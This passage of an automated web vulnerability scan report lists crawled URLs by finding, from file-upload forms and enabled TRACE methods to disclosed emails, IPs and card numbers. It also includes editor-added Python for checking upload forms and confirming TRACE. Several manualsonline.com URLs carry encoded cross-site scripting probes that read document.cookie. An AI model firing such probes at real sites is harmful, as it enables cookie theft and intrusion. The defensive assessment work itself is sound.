21.395. http://www.slackbooks.com/clinical+nursing+resources

21.396. http://www.slackbooks.com/default.aspx

21.397. http://www.slackbooks.com/essentialknee

21.398. http://www.slackbooks.com/favicon.ico

21.399. http://www.slackbooks.com/gastroenterology

21.400. http://www.slackbooks.com/homemodification

21.401. http://www.slackbooks.com/occupational+therapy

21.402. http://www.slackbooks.com/ophthalmic+technology

21.403. http://www.slackbooks.com/ophthalmology

21.404. http://www.slackbooks.com/orthopedics

21.405. http://www.slackbooks.com/pediatrics

21.406. http://www.smartertechnology.com/c/s/Tools/

21.407. http://www.spiele365.com/

21.408. http://www.splunk.com/page/ask_expert

21.409. http://www.splunk.com/page/ask_expert/default/3107

21.410. http://www.splunk.com/page/ask_expert/default/4396

21.411. http://www.splunk.com/page/sign_up

21.412. http://www.splunk.com/partners

21.413. http://www.squidoo.com/

21.414. http://www.startaid.com/

21.415. http://www.stumbleupon.com/

21.416. http://www.stumpedia.com/

21.417. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

21.418. http://www.technotizie.it/

21.419. http://www.topshareware.com/aplikasi-games-buat-hp-nexian-g522/downloads/1.htm

21.420. http://www.tumblr.com/

21.421. http://www.usbjd.org/

21.422. http://www.vibrantmedia.co.uk/

21.423. http://www.vibrantmedia.com/

21.424. http://www.vibrantmedia.com/about/board.asp

21.425. http://www.vibrantmedia.com/about/contact.asp

21.426. http://www.vibrantmedia.com/about/index.asp

21.427. http://www.vibrantmedia.com/whatisIntelliTXT.asp

21.428. http://www.w7o.de/

21.429. http://www.walmart.com/cp/Electronics/3944

21.430. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

21.431. http://www.webnews.de/

21.432. http://www.widgetbox.com/widget/bookmarks-kledyde

21.433. http://www.wists.com/

21.434. http://www.wyanokeis.com/create.aspx

21.435. http://www.yasni.de/

21.436. http://www.yigg.de/

21.437. http://www.yoolink.fr/

21.438. http://www.youtube.com/embed/208T0-OLXA8

21.439. http://www.youtube.com/embed/5aWd_-x1oPE

21.440. http://www.youtube.com/html5

21.441. http://www.youtube.com/select_3d_mode

21.442. http://www201.americanexpress.com/business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789

21.443. http://www201.americanexpress.com/business-credit-cards/business-solutions/overview

21.444. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/pass_markup_homepage.do

21.445. http://youmob.com/

21.446. http://zdpub.vo.llnwd.net/o2/ziffdavisplayer/flvplayer2.html

22. File upload functionality

22.1. http://cdn.manualsonline.com/javascript/libs-2.8.3.4.js

22.2. http://cdn.manualsonline.com/javascript/libs-2.8.3.4.js

22.3. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem

22.4. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem

22.5. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem

22.6. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/

22.7. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/

22.8. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/

22.9. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/

22.10. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/

22.11. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/

22.12. http://malsup.com/jquery/form/

22.13. http://nyromodal.nyrodev.com/

22.14. http://nyromodal.nyrodev.com/

22.15. http://www.symbaloo.com/
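
The entries above are pages on which the crawler saw a file-upload form (several of them, such as the jQuery Form plugin and nyroModal pages, are library demo pages rather than application endpoints). Before spending time on a listed page it helps to pull the actual upload forms out of the HTML: where they post to, and whether the form is even capable of sending file bytes. The following is an editor-added check, not code from the CloudScan crawler or from any site in the list; the sample HTML and the base URL are constructed placeholders. A form holding an `<input type="file">` without `enctype="multipart/form-data"` (or with method GET) only transmits the file name, so it is worth flagging separately rather than treated as a working upload.

```python
"""Added example (editor's code, not CloudScan's): list upload forms in a page.

For each <form> containing an <input type="file"> the parser records the
resolved action URL, method, enctype and file field names, and whether a
browser would actually transmit file content (POST + multipart/form-data).
Script-driven uploaders (Flash, iframe tricks, XHR plugins) do not appear in
static markup and still need a manual look.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin

DEFAULT_ENCTYPE = "application/x-www-form-urlencoded"


class UploadFormFinder(HTMLParser):
    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lower-cases tag and attribute names
        if tag == "form":
            self._current = {
                "action": urljoin(self.base_url, a.get("action") or ""),
                "method": (a.get("method") or "GET").upper(),
                "enctype": (a.get("enctype") or DEFAULT_ENCTYPE).lower(),
                "file_fields": [],
            }
        elif (tag == "input" and self._current is not None
              and (a.get("type") or "").lower() == "file"):
            self._current["file_fields"].append(a.get("name") or "")

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            form = self._current
            if form["file_fields"]:
                # Only POST + multipart actually carries the file body.
                form["multipart_ok"] = (form["method"] == "POST"
                                        and form["enctype"] == "multipart/form-data")
                self.forms.append(form)
            self._current = None


def find_upload_forms(base_url, html_text):
    """Return a list of upload-capable forms found in html_text, in page order."""
    parser = UploadFormFinder(base_url)
    parser.feed(html_text)
    parser.close()
    return parser.forms


# Constructed sample page; the host and paths are placeholders, not sites from the report.
SAMPLE_BASE_URL = "http://www.example.test/support/ask.php"
SAMPLE_HTML = """
<html><body>
<form action="upload.php" method="post" enctype="multipart/form-data">
  <input type="text" name="title">
  <input type="file" name="attachment">
  <input type="submit">
</form>
<form action="/profile/save" method="POST">
  <input type="file" name="avatar">
</form>
<form action="/search" method="get"><input type="text" name="q"></form>
</body></html>
"""

if __name__ == "__main__":
    for form in find_upload_forms(SAMPLE_BASE_URL, SAMPLE_HTML):
        print(form["method"], form["action"], form["file_fields"],
              "OK" if form["multipart_ok"] else "file body NOT sent (enctype/method)")
```

Once the real target form is known, the manual work starts: extension and content-type handling, whether the stored file is served back from a web-reachable path, and whether the filename is used unsanitised in the storage path.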

23. TRACE method is enabled

23.1. http://a.ligatus.com/

23.2. http://a.ligatus.de/

23.3. http://bassistance.de/

23.4. http://blog.owneriq.com/

23.5. http://channelmarketing.owneriq.com/

23.6. http://chitika.com/

23.7. http://dailyme.com/

23.8. http://demos.spongecell.com/

23.9. http://digg.com/

23.10. http://diveintomark.org/

23.11. http://e.ligatus.com/

23.12. http://en.wikipedia.org/

23.13. http://enterprisemediagroup.112.2o7.net/

23.14. http://fancy.klade.lv/

23.15. http://gsgd.co.uk/

23.16. http://identi.ca/

23.17. http://images.devshed.com/

23.18. http://imera.com.br/

23.19. http://jquery.org/

23.20. http://labs.chitika.com/

23.21. http://metrics.blackberry.com/

23.22. http://multiply.com/

23.23. http://packetstorm.linuxsecurity.com/

23.24. http://phonefavs.com/

23.25. http://ping.fm/

23.26. http://readitlaterlist.com/

23.27. http://smaknews.com/

23.28. http://statistics.wibiya.com/

23.29. http://tracker.icerocket.com/

23.30. http://unalog.com/

23.31. http://wstat.wibiya.com/

23.32. http://www.aim.com/

23.33. http://www.allvoices.com/

23.34. http://www.bargainforce.com/

23.35. http://www.bookmarks.fr/

23.36. http://www.care2.com/

23.37. http://www.codylindley.com/

23.38. http://www.connotea.org/

23.39. http://www.gabbr.com/

23.40. http://www.instapaper.com/

23.41. http://www.jamespot.com/

23.42. http://www.khabbr.com/

23.43. http://www.linkagogo.com/

23.44. http://www.linkatopia.com/

23.45. http://www.manualsonline.com/

23.46. http://www.mister-wong.com/

23.47. http://www.netvouz.com/

23.48. http://www.nmworkwear.de/

23.49. http://www.orthougm.com/

23.50. http://www.splunk.com/

23.51. http://www.traffictrack.de/

23.52. http://www91.intel.com/

23.53. http://ziffdavisbaseline.112.2o7.net/
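
A crawler usually reports "TRACE method is enabled" from an OPTIONS/Allow header or from any 200 answer to a TRACE request, both of which produce false positives (catch-all pages, front-end proxies answering for the origin). The check below is an editor-added example, not code from the CloudScan crawler or from any host listed above, and only treats TRACE as enabled when the server returns 200 with Content-Type message/http and echoes a marker header that the probe itself inserted. The sample responses are constructed so the check runs offline; the `probe()` function does the live version over a plain socket and is the only part that touches the network.

```python
"""Added example (editor's code, not CloudScan's): confirm a TRACE finding.

TRACE is genuinely enabled only when the server echoes the request back
(200, Content-Type: message/http, body = our request). A 405/501, or a 200
that is really a catch-all page, must not be reported.
"""
import re
import socket

MARKER_HEADER = "X-Trace-Check"


def build_trace_request(host, path="/", marker="xst-probe-1"):
    """Raw HTTP/1.1 TRACE request carrying a marker header we expect echoed."""
    lines = [
        "TRACE %s HTTP/1.1" % path,
        "Host: %s" % host,
        "%s: %s" % (MARKER_HEADER, marker),
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def parse_response(raw):
    """Split a raw response into (status code, lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    m = re.match(r"HTTP/\d\.\d (\d{3})", status_line)
    status = int(m.group(1)) if m else 0
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def trace_enabled(raw, marker="xst-probe-1"):
    """True only for a genuine echo: 200 + message/http + our marker in the body."""
    status, headers, body = parse_response(raw)
    if status != 200:
        return False
    if not headers.get("content-type", "").lower().startswith("message/http"):
        return False
    return ("%s: %s" % (MARKER_HEADER, marker)).encode("ascii") in body


def probe(host, port=80, timeout=5.0):
    """Live check over plain TCP (not exercised offline).
    For HTTPS wrap the socket with ssl.create_default_context().wrap_socket()."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_trace_request(host))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return trace_enabled(b"".join(chunks))


# Constructed sample responses; the hostname is a placeholder, not a host from the report.
_ECHO = build_trace_request("www.example.test")
ENABLED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: message/http\r\n"
    + b"Content-Length: %d\r\n\r\n" % len(_ECHO)
    + _ECHO
)
DISABLED_RESPONSE = (
    b"HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, HEAD, POST\r\n"
    b"Content-Length: 0\r\n\r\n"
)
# A 200 that is not an echo (catch-all page) must not be reported as TRACE.
FAKE_200_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>ok</html>"

if __name__ == "__main__":
    for name, raw in [("enabled", ENABLED_RESPONSE), ("405", DISABLED_RESPONSE),
                      ("fake 200", FAKE_200_RESPONSE)]:
        print(name, "->", trace_enabled(raw))
```

On severity: the classic impact of an enabled TRACE is cross-site tracing (reading a victim's cookies or Authorization header out of the echo), which needs a client that will issue a TRACE cross-origin; XMLHttpRequest and fetch refuse the TRACE method, so on its own the finding is usually low and the fix is simply to disable the method (for Apache httpd, `TraceEnable off`).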

24. Directory listing

25. Email addresses disclosed

25.1. http://answers.splunk.com/

25.2. http://answers.splunk.com/questions/ask

25.3. http://appdeveloper.intel.com/sites/all/themes/intel_agate/js/ie6update.js

25.4. http://appdeveloper.intel.com/sites/files/js/js_7bb4b4dc8fd7fed99ab6ae62228d80b1.js

25.5. http://bassistance.de/jquery-plugins/jquery-plugin-validation/

25.6. http://blog.owneriq.com/

25.7. http://blogs.splunk.com/

25.8. http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/lib/en/resources.xml

25.9. http://channelmarketing.owneriq.com/rmb-account/login-page

25.10. http://coverall.splunk.com/themes/splunk_com/scripts/js/jquery.dimensions.min.js

25.11. http://cryptography.org/getpgp.htm

25.12. http://dean.edwards.name/weblog/2006/03/base/

25.13. http://demos.spongecell.com/404.html

25.14. http://docs.jquery.com/Plugins/Validation

25.15. https://ebus.ota.org/default.aspx

25.16. http://ecal.forexpros.com/common/CalendarPopup.js

25.17. http://etfdb.com/

25.18. http://groups.google.com/group/jquery-dev/browse_thread/thread/36395b7ab510dd5d

25.19. http://gsgd.co.uk/sandbox/jquery/easing/

25.20. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem

25.21. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/

25.22. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%27%3balert%281%29%2f%2f35f276845e/product_problem/

25.23. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/

25.24. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%27%3balert%28document.cookie%29%2f%2f8fcf167d281/d/type/product_problem/

25.25. http://homeappliance.manualsonline.com/managemystuff.html

25.26. http://internetmailmanager.com/s/svrg.asp

25.27. http://javascript.crockford.com/jsmin.html

25.28. http://jqueryui.com/about

25.29. http://kambimagazine.blogspot.com/2007/08/malayalam-kambikathakal-kambi-kathakal.html

25.30. http://lovely-faces.com/lib/js/ModalPopups.js

25.31. http://mallustories1.blogspot.com/

25.32. http://mallustories1.blogspot.com/2008/11/malayalam-hot-stories.html

25.33. http://mallustories1.blogspot.com/2009/02/adhyanubavam.html

25.34. http://mir.aculo.us/

25.35. http://opensource.org/licenses/lgpl-license.php

25.36. http://opensource.org/licenses/mit-license.php

25.37. http://rmncdn.com/widget_cdn.html

25.38. http://rydex-sgi.com/equalweight/

25.39. http://sans.org/

25.40. http://shop.vodafone.de/scripts/jquery.cookie.pack.js

25.41. http://shop.vodafone.de/scripts/vodafone.global.js

25.42. http://slashdot.org/

25.43. http://slashdot.org/submit.pl

25.44. http://sourceforge.net/projects/winscp/

25.45. http://splunkbase.splunk.com/apps/All/4.x/App/app:PCI+App+-+Creative+Commons+Version

25.46. http://static.forexyard.com/class/modules/ajax/AjaxRequest.js

25.47. http://tipd.com/modules/jquery/js/jquery.cookie.js

25.48. http://tools.ietf.org/html/rfc3986

25.49. http://www.2600.com/

25.50. http://www.alvit.de/css-showcase/

25.51. http://www.baselinemag.com/js/s_code_relcon_new.js

25.52. http://www.baselinemag.com/js/s_code_remote_new.js

25.53. http://www.baysideeyes.com.au/referrer-information.htm

25.54. http://www.beckerortho.com/

25.55. http://www.beckerortho.com/pastfp.htm

25.56. http://www.beckerortho.com/services.htm

25.57. http://www.bibsonomy.org/

25.58. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

25.59. http://www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_9-1/ip_addresses.html

25.60. http://www.codero.com/css/screen.css

25.61. http://www.codero.com/css/style.css

25.62. http://www.codero.com/js/hoverIntent.js

25.63. http://www.csc.gatech.edu/copeland/jac/6612/info/Install-wireshark-on-MacOS.html

25.64. http://www.csc.gatech.edu/copeland/jac/6612/info/SSH-No-Password-Login.txt

25.65. http://www.csc.gatech.edu/~copeland/6612/info/Install-wireshark-on-MacOS.html

25.66. http://www.cygwin.com/

25.67. http://www.dest-unreach.org/socat/

25.68. http://www.ebooklibs.com/

25.69. http://www.ece.gatech.edu/about/contact_us.html

25.70. http://www.eecis.udel.edu/~ntp/

25.71. http://www.gatech.edu/support/legal.html

25.72. http://www.gnu.org/licenses/gpl.html

25.73. http://www.gnu.org/licenses/lgpl.html

25.74. http://www.godaddy.com/default.aspx

25.75. http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js

25.76. http://www.gpg.org/

25.77. http://www.hemidemi.com/

25.78. http://www.hyves.nl/

25.79. http://www.instapaper.com/

25.80. http://www.jazdtech.com/css/favicon.ico

25.81. http://www.kledy.co.uk/modules/exp_easynews/css/easynews.css

25.82. http://www.kledy.co.uk/modules/exp_gallery/css/master.css

25.83. http://www.kledy.co.uk/modules/exp_hotnews/css/exphotnews.css

25.84. http://www.kledy.co.uk/modules/exp_newpage/css/expnewpage.css

25.85. http://www.kledy.co.uk/modules/exp_radio/css/expradio.css

25.86. http://www.kledy.de/modules/exp_gallery/css/master.css

25.87. http://www.kledy.de/modules/exp_hotnews/css/exphotnews.css

25.88. http://www.kledy.de/modules/exp_newpage/css/expnewpage.css

25.89. http://www.kledy.de/modules/exp_radio/css/expradio.css

25.90. http://www.kledy.es/modules/exp_easynews/css/easynews.css

25.91. http://www.kledy.es/modules/exp_gallery/css/master.css

25.92. http://www.kledy.es/modules/exp_hotnews/css/exphotnews.css

25.93. http://www.kledy.es/modules/exp_newpage/css/expnewpage.css

25.94. http://www.kledy.es/modules/exp_radio/css/expradio.css

25.95. http://www.kledy.it/modules/exp_easynews/css/easynews.css

25.96. http://www.kledy.it/modules/exp_gallery/css/master.css

25.97. http://www.kledy.it/modules/exp_hotnews/css/exphotnews.css

25.98. http://www.kledy.it/modules/exp_newpage/css/expnewpage.css

25.99. http://www.kledy.it/modules/exp_radio/css/expradio.css

25.100. http://www.kledy.us/modules/exp_easynews/css/easynews.css

25.101. http://www.kledy.us/modules/exp_gallery/css/master.css

25.102. http://www.kledy.us/modules/exp_hotnews/css/exphotnews.css

25.103. http://www.kledy.us/modules/exp_newpage/css/expnewpage.css

25.104. http://www.kledy.us/modules/exp_radio/css/expradio.css

25.105. http://www.klivio.com/modules/exp_hotnews/css/exphotnews.css

25.106. http://www.klivio.com/modules/exp_radio/css/expradio.css

25.107. http://www.linuxsecurity.com/templates/LSv3-0.1-Front/jscript/prototype.js

25.108. http://www.macports.org/

25.109. http://www.manualsonline.com/privacy.html

25.110. http://www.manualsonline.com/tc.html

25.111. http://www.networksimplicity.com/openssh/

25.112. http://www.nmworkwear.de/

25.113. http://www.nmworkwear.de/index.php

25.114. http://www.ntp.org/

25.115. http://www.oit.gatech.edu/service/software-distribution/software-distribution

25.116. http://www.opensource.org/licenses

25.117. http://www.opensource.org/licenses/gpl-license.php

25.118. http://www.opensource.org/licenses/mit-license.php

25.119. http://www.orthougm.com/angelina_jolean.html

25.120. http://www.ota.org/

25.121. http://www.ota.org/contact/contact.html

25.122. http://www.ota.org/donorForm/donorform.cfm

25.123. http://www.ota.org/education_skeletal/index.html

25.124. http://www.ota.org/index.html

25.125. http://www.ota.org/international/international.html

25.126. http://www.ota.org/members_only/login_menu.cfm

25.127. http://www.ota.org/membership_dir/memdir.cfm

25.128. http://www.ota.org/policy/health_policy.html

25.129. http://www.ota.org/sitemap/sitemap.html

25.130. http://www.othawaii.com/default.asp

25.131. http://www.owneriq.com/

25.132. http://www.owneriq.com/about-us

25.133. http://www.owneriq.com/careers

25.134. http://www.owneriq.com/contact-us

25.135. http://www.owneriq.com/events

25.136. http://www.owneriq.com/images/iconError.png

25.137. http://www.owneriq.com/investors

25.138. http://www.owneriq.com/js/jquery.cookie.js

25.139. http://www.owneriq.com/management

25.140. http://www.owneriq.com/manuals-online

25.141. http://www.owneriq.com/mostiq

25.142. http://www.owneriq.com/opt-out

25.143. http://www.owneriq.com/ownership-targeting

25.144. http://www.owneriq.com/partners

25.145. http://www.owneriq.com/press

25.146. http://www.owneriq.com/press-coverage

25.147. http://www.owneriq.com/privacy-policy

25.148. http://www.owneriq.com/product-ownership-party

25.149. http://www.owneriq.com/retailers-and-manufacturers

25.150. http://www.owneriq.com/retargeting

25.151. http://www.owneriq.com/reversing-market-research

25.152. http://www.owneriq.com/rmb-account/create

25.153. http://www.owneriq.com/rmb-cabinet/read-calculator

25.154. http://www.owneriq.com/sitemap

25.155. http://www.peppernews.eu/templates/SquaretleFive/images/about.gif

25.156. http://www.pointehilton.com/toolkit/presentation/shell/hpportal/assets/js/jquery.bgiframe.js

25.157. http://www.positioniseverything.net/explorer/expandingboxbug.html

25.158. http://www.printfriendly.com/

25.159. http://www.shoppinga.de/modules/exp_hotnews/css/exphotnews.css

25.160. http://www.slackbooks.com/404.aspx

25.161. http://www.slackbooks.com/Athletic+Training

25.162. http://www.slackbooks.com/BestSellers.aspx

25.163. http://www.slackbooks.com/ContactUs.aspx

25.164. http://www.slackbooks.com/Manual+Therapy

25.165. http://www.slackbooks.com/NewTitleNotification.aspx

25.166. http://www.slackbooks.com/Orthotics+and+Prosthetics

25.167. http://www.slackbooks.com/Physical+Therapy

25.168. http://www.slackbooks.com/ShoppingCart.aspx

25.169. http://www.slackbooks.com/aclreconstuct

25.170. http://www.slackbooks.com/ccacl

25.171. http://www.slackbooks.com/ccknee

25.172. http://www.slackbooks.com/clinical+nursing+resources

25.173. http://www.slackbooks.com/default.aspx

25.174. http://www.slackbooks.com/essentialknee

25.175. http://www.slackbooks.com/favicon.ico

25.176. http://www.slackbooks.com/gastroenterology

25.177. http://www.slackbooks.com/homemodification

25.178. http://www.slackbooks.com/occupational+therapy

25.179. http://www.slackbooks.com/ophthalmic+technology

25.180. http://www.slackbooks.com/ophthalmology

25.181. http://www.slackbooks.com/orthopedics

25.182. http://www.slackbooks.com/pediatrics

25.183. http://www.slackinc.com/permissions/

25.184. http://www.slackinc.com/privacypolicy.asp

25.185. https://www.slackinc.com/reprints/order.asp

25.186. http://www.splunk.com/page/ask_expert/default/3107

25.187. http://www.splunk.com/page/company_news

25.188. http://www.splunk.com/page/events

25.189. http://www.splunk.com/page/release_rss

25.190. http://www.splunk.com/page/road_map_vote

25.191. http://www.splunk.com/services

25.192. http://www.splunk.com/solutions

25.193. http://www.splunk.com/view/

25.194. http://www.splunk.com/view/SP-CAAAAAH

25.195. http://www.splunk.com/view/SP-CAAAAH7

25.196. http://www.splunk.com/view/application-management-solutions/SP-CAAADSC

25.197. http://www.splunk.com/view/contact-us/SP-CAAAAH7

25.198. http://www.splunk.com/view/education/SP-CAAAAH9

25.199. http://www.splunk.com/view/government/SP-CAAADSN

25.200. http://www.splunk.com/view/it-operations-solutions/SP-CAAADSA

25.201. http://www.splunk.com/view/long-tail/SP-CAAAE7F

25.202. http://www.splunk.com/view/partner-programs/SP-CAAACED

25.203. http://www.splunk.com/view/professional-services/SP-CAAABH9

25.204. http://www.splunk.com/view/resources/SP-CAAACGF

25.205. http://www.splunk.com/view/security-and-compliance-solutions/SP-CAAADSB

25.206. http://www.splunk.com/view/services/SP-CAAAFQJ

25.207. http://www.stumpedia.com/

25.208. http://www.stunnel.org/

25.209. http://www.symbaloo.com/

25.210. http://www.thumbshots.com/

25.211. http://www.tocka.com.mk/sonovnik.php

25.212. http://www.vibrantmedia.com/about/contact.asp

25.213. http://www.w3.org/TR/html4/loose.dtd

25.214. http://www.w3.org/TR/html4/strict.dtd

25.215. http://www.w3.org/TR/html4/strict.dtd/

25.216. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

25.217. http://www212.americanexpress.com/dsmlive/dsm/dom/us/en/legaldisclosures/websiterulesandregulations.do

25.218. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do

25.219. http://www7.aaos.org/education/courses/course_detail.aspx

26. Private IP addresses disclosed

26.1. http://answers.splunk.com/

26.2. http://au2m8.com/

26.3. http://au2m8.com/

26.4. https://axptravel.americanexpress.com/consumertravel/travel.do

26.5. http://current.com/

26.6. http://digg.com/

26.7. http://digg.com/submit

26.8. http://digg.com/submit

26.9. http://eisenstein.dk/loader/qt.php

26.10. https://online.americanexpress.com/myca/acctsumm/us/action

26.11. https://online.americanexpress.com/myca/logon/us/action

26.12. https://rewards.americanexpress.com/myca/loyalty/us/rewards/mracctmgmt/acctsumm

26.13. http://shop.vodafone.de/micropages/cookie-setting-page.htm

26.14. http://splunkbase.splunk.com/apps/All/4.x/Add-On/app:Google+Maps

26.15. http://static.ak.fbcdn.net/rsrc.php/zq/r/LfCa7NaF9mt.png

26.16. http://technorati.com/

26.17. http://tools.ietf.org/html/rfc3986

26.18. http://www.au2m8.com/favicon.ico

26.19. http://www.au2m8.com/v/

26.20. http://www.au2m8.com/v/

26.21. http://www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_9-1/ip_addresses.html

26.22. http://www.download32.com/iseu---eu-domain-availability-checker-i24769.html

26.23. http://www.facebook.com/BlackBerryZA

26.24. http://www.facebook.com/vibrantmedia

26.25. http://www.officedepot.com/

26.26. http://www.orthougm.com/nslookup.html

27. Credit card numbers disclosed

27.1. http://www.beckerortho.com/assets/pdf/Model1017.pdf

27.2. http://www.beckerortho.com/assets/pdf/pacTE.pdf

27.3. http://www.beckerortho.com/distrib.htm

27.4. http://www.download32.com/search/Array

27.5. http://www.merapakistan.com/directory/draw_list_prize_bond_draw_result_7500.html

28. Robots.txt file

28.1. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496

28.2. http://ad.de.doubleclick.net/N6514/adj/miwi/

28.3. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.11

28.4. http://ad.zanox.com/ppv/

28.5. http://b.static.ak.fbcdn.net/rsrc.php/yV/r/48SBskNJuXC.css

28.6. http://b.voicefive.com/b

28.7. http://bassistance.de/jquery-plugins/jquery-plugin-validation/

28.8. http://blog.freedownloadscenter.com/

28.9. http://blog.owneriq.com/

28.10. http://blogmarks.net/

28.11. http://bookmarks.yahoo.com/

28.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.13. http://buzz.yahoo.com/

28.14. http://cdn.manualsonline.com/javascript/libs-2.8.3.4.js

28.15. http://cdn.royale.spongecell.com/api/widgets/263365.js/

28.16. http://chitika.com/publishers.php

28.17. http://clk.redcated/229/go/253329229/direct

28.18. http://current.com/

28.19. http://dailyme.com/

28.20. http://demos.us.intellitxt.com/demos/lab/windows_live/flash_concepts/assets/instantAnswer/preloader.swf

28.21. http://developers.facebook.com/plugins/

28.22. http://digg.com/

28.23. http://ds.serving-sys.com/BurstingRes/CustomScripts/PL_ManuallyExpandPanelAfterScroll_728x90.js

28.24. http://dslshop.vodafone.de/eshop/pv/97444194

28.25. http://e.ligatus.com/LigatusFallback.gif

28.26. http://eisenstein.dk/loader/qt.php

28.27. http://en.wikipedia.org/wiki/MIT_License

28.28. http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s23179186573252

28.29. http://faves.com/

28.30. http://feedburner.google.com/fb/a/mailverify

28.31. http://feeds.feedburner.com/~fc/tipd

28.32. http://friendfeed.com/

28.33. http://googleads.g.doubleclick.net/pagead/ads

28.34. http://groups.google.com/group/jquery-dev/browse_thread/thread/36395b7ab510dd5d

28.35. http://hhonors1.hilton.com/en_US/hh/home_index.do

28.36. http://hiltonworldwide1.hilton.com/en_US/ww/customersupport/privacy-policy.do

28.37. http://identi.ca/

28.38. http://imera.com.br/

28.39. http://img.constantcontact.com/lp/images/standard/spacer.gif/

28.40. http://jlinks.industrybrains.com/jsct

28.41. http://jquery.org/license

28.42. http://jqueryui.com/about

28.43. http://l.addthiscdn.com/live/t00/250lo.gif

28.44. http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js

28.45. http://mail.google.com/mail/

28.46. http://malsup.com/jquery/form/

28.47. http://metrics.blackberry.com/b/ss/rimglobal,rimbbus/1/H.22.1/s28855670725461

28.48. http://metrixlablw.customers.luna.net/p10833/tagger_v03.php

